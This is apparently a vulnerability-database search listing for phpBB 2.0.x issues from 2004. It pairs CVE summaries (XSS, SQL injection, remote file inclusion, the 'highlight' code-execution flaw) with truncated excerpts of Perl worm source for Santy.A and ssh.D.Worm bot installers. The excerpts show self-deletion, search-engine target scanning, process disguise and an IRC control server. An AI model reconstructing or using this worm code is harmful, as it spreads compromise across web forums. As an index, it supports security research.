
2176 matches found

Exploit DB
added 2005/01/04 12:0 a.m., 38 views

phpBB 2.0.10 - 'ssh.D.Worm' Bot Install Altavista

!/usr/bin/perl ------------------------------------------------------------------------ Severino Honorato - /server irc.priv8crew.info Priv8crew - ssh.D.Worm use IO::Socket; use LWP::Simple; my $processo = "/usr/local/apache/bin/httpd -DSSL"; $SIG"INT" = "IGNORE"; $SIG"HUP" = "IGNORE"; $SIG"TERM"...

AI score: 7.4
Exploits: 0

seebug.org
added 2005/01/04 12:0 a.m., 26 views

phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm)

No description provided by source. !/usr/bin/perl ------------------------------------------------------------------------ Severino Honorato - /server irc.priv8crew.info Priv8crew - ssh.D.Worm use IO::Socket; use LWP::Simple; my $processo = "/usr/local/apache/bin/httpd -DSSL"; $SIG"INT" = "IGNORE...

AI score: 7.1
Exploits: 0

0day.today
added 2005/01/04 12:0 a.m., 126 views

phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm)

Exploit for unknown platform in category web applications ==================================================== phpBB / $ae= s//$1/; $uber=$1; $uber = s/ //g; $uber = s///g; $uber = s///g; $uber = s/wb...

AI score: 7.1
Exploits: 0

NVD
added 2004/12/31 5:0 a.m., 6 views

CVE-2004-2358

Cross-site scripting (XSS) vulnerability in admin_words.php for phpBB 2.0.6c allows remote attackers to inject arbitrary web script or HTML via the id parameter...

CVSS: 4.3, AI score: 5.8, EPSS: 0.00396
Exploits: 1, References: 3

NVD
added 2004/12/31 5:0 a.m., 10 views

CVE-2004-2350

SQL injection vulnerability in search.php for phpBB 1.0 through 2.0.6 allows remote attackers to execute arbitrary SQL and gain privileges via the search_results parameter...

CVSS: 7.5, AI score: 8.4, EPSS: 0.00536
Exploits: 1, References: 3

NVD
added 2004/12/31 5:0 a.m., 13 views

CVE-2004-1399

Directory traversal vulnerability in the Attachment module 2.3.10 and earlier for phpBB allows remote attackers to read arbitrary files via a .. (dot dot) in the filename...

CVSS: 5, AI score: 6.7, EPSS: 0.00457
Exploits: 0, References: 4

NVD
added 2004/12/31 5:0 a.m., 13 views

CVE-2004-1404

Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code...

CVSS: 7.5, AI score: 7.5, EPSS: 0.02468
Exploits: 0, References: 5

NVD
added 2004/12/31 5:0 a.m., 10 views

CVE-2004-1535

PHP remote file inclusion vulnerability in admin_cash.php for the Cash Mod module for phpBB allows remote attackers to execute arbitrary PHP code by modifying the phpbb_root_path parameter to reference a URL on a remote web server that contains the code...

CVSS: 7.5, AI score: 7.6, EPSS: 0.02238
Exploits: 0, References: 3

Cvelist
added 2004/12/31 5:0 a.m., 17 views

CVE-2004-1315

viewtopic.php in phpBB 2.x before 2.0.11 improperly URL decodes the highlight parameter when extracting words and phrases to highlight, which allows remote attackers to execute arbitrary PHP code by double-encoding the highlight value so that special characters are inserted into the result, which...

AI score: 7.3, EPSS: 0.85909
Exploits: 11, References: 11

CVE
added 2004/12/31 5:0 a.m., 188 views

CVE-2004-1315

Summary: CVE-2004-1315 affects phpBB 2.x prior to 2.0.11. The vulnerability stems from improper URL decoding of the highlight parameter in viewtopic.php, allowing a remote attacker to double-encode the highlight value so that PHP exec runs arbitrary code. Exploited in the wild by the Santy.A worm...

CVSS: 7.5, AI score: 7.2, EPSS: 0.85909
Exploits: 11, References: 11, Affected Software: 1

NVD
added 2004/12/31 5:0 a.m., 9 views

CVE-2004-2054

CRLF injection vulnerability in PhpBB 2.0.4 and 2.0.9 allows remote attackers to perform HTTP Response Splitting attacks to modify expected HTML content from the server via (1) the mode parameter to privmsg.php or (2) the redirect parameter to login.php...

CVSS: 5, AI score: 6.8, EPSS: 0.00563
Exploits: 1, References: 4

NVD
added 2004/12/31 5:0 a.m., 15 views

CVE-2004-1809

Cross-site scripting (XSS) vulnerability in phpBB 2.0.6d and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) postdays parameter to viewtopic.php or (2) topicdays parameter to viewforum.php...

CVSS: 4.3, AI score: 5.7, EPSS: 0.00558
Exploits: 0, References: 8

seebug.org
added 2004/12/25 12:0 a.m., 31 views

Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)

No description provided by source. /usr/bin/perl use IO::Socket; use LWP::Simple; @vul = ""; $a=0; $numero = int rand999; $site = "search.aol.com"; $procura = "viewtopic.php%3Ft%3D$numero"; for$n=0;$n90;$n += 10 $sock = IO::Socket::INET-newPeerAddr="$site",PeerPort="80",Proto="tcp" or next; print...

AI score: 7.1
Exploits: 0

0day.today
added 2004/12/25 12:0 a.m., 170 views

Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)

Exploit for unknown platform in category web applications ========================================================= Sanity.b - phpBB newPeerAddr="$site",PeerPort="80",Proto="tcp" or next; print $sock "GET /aolcom/search?q=$procura&Stage=0&page=$n HTTP/1.0\n\n"; @resu = ; close$sock; $ae = "@resu"...

AI score: 7.1
Exploits: 0

NVD
added 2004/12/23 5:0 a.m., 16 views

CVE-2004-2130

Multiple cross-site scripting (XSS) vulnerabilities in privmsg.php in phpBB 2.0.6 allow remote attackers to execute arbitrary script or HTML via the (1) folder or (2) mode variables...

CVSS: 4.3, AI score: 6.2, EPSS: 0.07292
Exploits: 1, References: 3

Exploit DB
added 2004/12/22 12:0 a.m., 62 views

phpBB < 2.0.10 - 'Santy.A Worm' 'highlight' Arbitrary File Upload

Santy.A - phpBB 3; open IN, $0 or exit; my $self = join '', ; close IN; unlink $0; while!GrabURL'http://www.google.com/advancedsearch' if$generation 3 PayLoad ; else exit; $self = s/my $generation = \d+;/'my $generation = ' . $1 + 1 . ';'/e; my $selfFileName = 'm1ho2of'; my $markStr =...

AI score: 7.4
Exploits: 0

0day.today
added 2004/12/22 12:0 a.m., 32 views

phpBB highlight Arbitrary File Upload (Santy.A)

Exploit for unknown platform in category web applications =============================================== phpBB highlight Arbitrary File Upload Santy.A =============================================== Santy.A - phpBB 3; open IN, $0 or exit; my $self = join '', ; close IN; unlink $0;...

AI score: 7.1
Exploits: 0

exploitpack
added 2004/12/22 12:0 a.m., 13 views

phpBB 2.0.10 - Santy.A Worm highlight Arbitrary File Upload

phpBB 2.0.10 - Santy.A Worm highlight Arbitrary File Upload Santy.A - phpBB 3; open IN, $0 or exit; my $self = join '', ; close IN; unlink $0; while!GrabURL'http://www.google.com/advancedsearch' if$generation 3 PayLoad ; else exit; $self = s/my $generation = \d+;/'my $generation = ' . $1 + 1...

AI score: 0.2
Exploits: 0

seebug.org
added 2004/12/22 12:0 a.m., 14 views

phpBB highlight Arbitrary File Upload (Santy.A)

No description provided by source. Santy.A - phpBB = 2.0.10 Web Worm Source Code Proof of Concept -SECU For educational purpose See : http://isc.sans.org/diary.php?date=2004-12-21 http://www.f-secure.com/v-descs/santya.shtml !/usr/bin/perl use strict; use Socket; sub PayLoad; sub DoDir$; sub DoFi...

AI score: 7.1
Exploits: 0

CERT
added 2004/12/21 12:0 a.m., 16 views

phpBB viewtopic.php fails to properly sanitize input passed to the "highlight" parameter

Overview: phpBB contains a user input validation problem with regard to the parsing of the URL. An intruder can deface a phpBB website, execute arbitrary commands, or gain administrative privileges on a compromised bulletin board. Description: phpBB is an open-source bulletin board. A lack of inpu...

AI score: 7.9
Exploits: 0, References: 3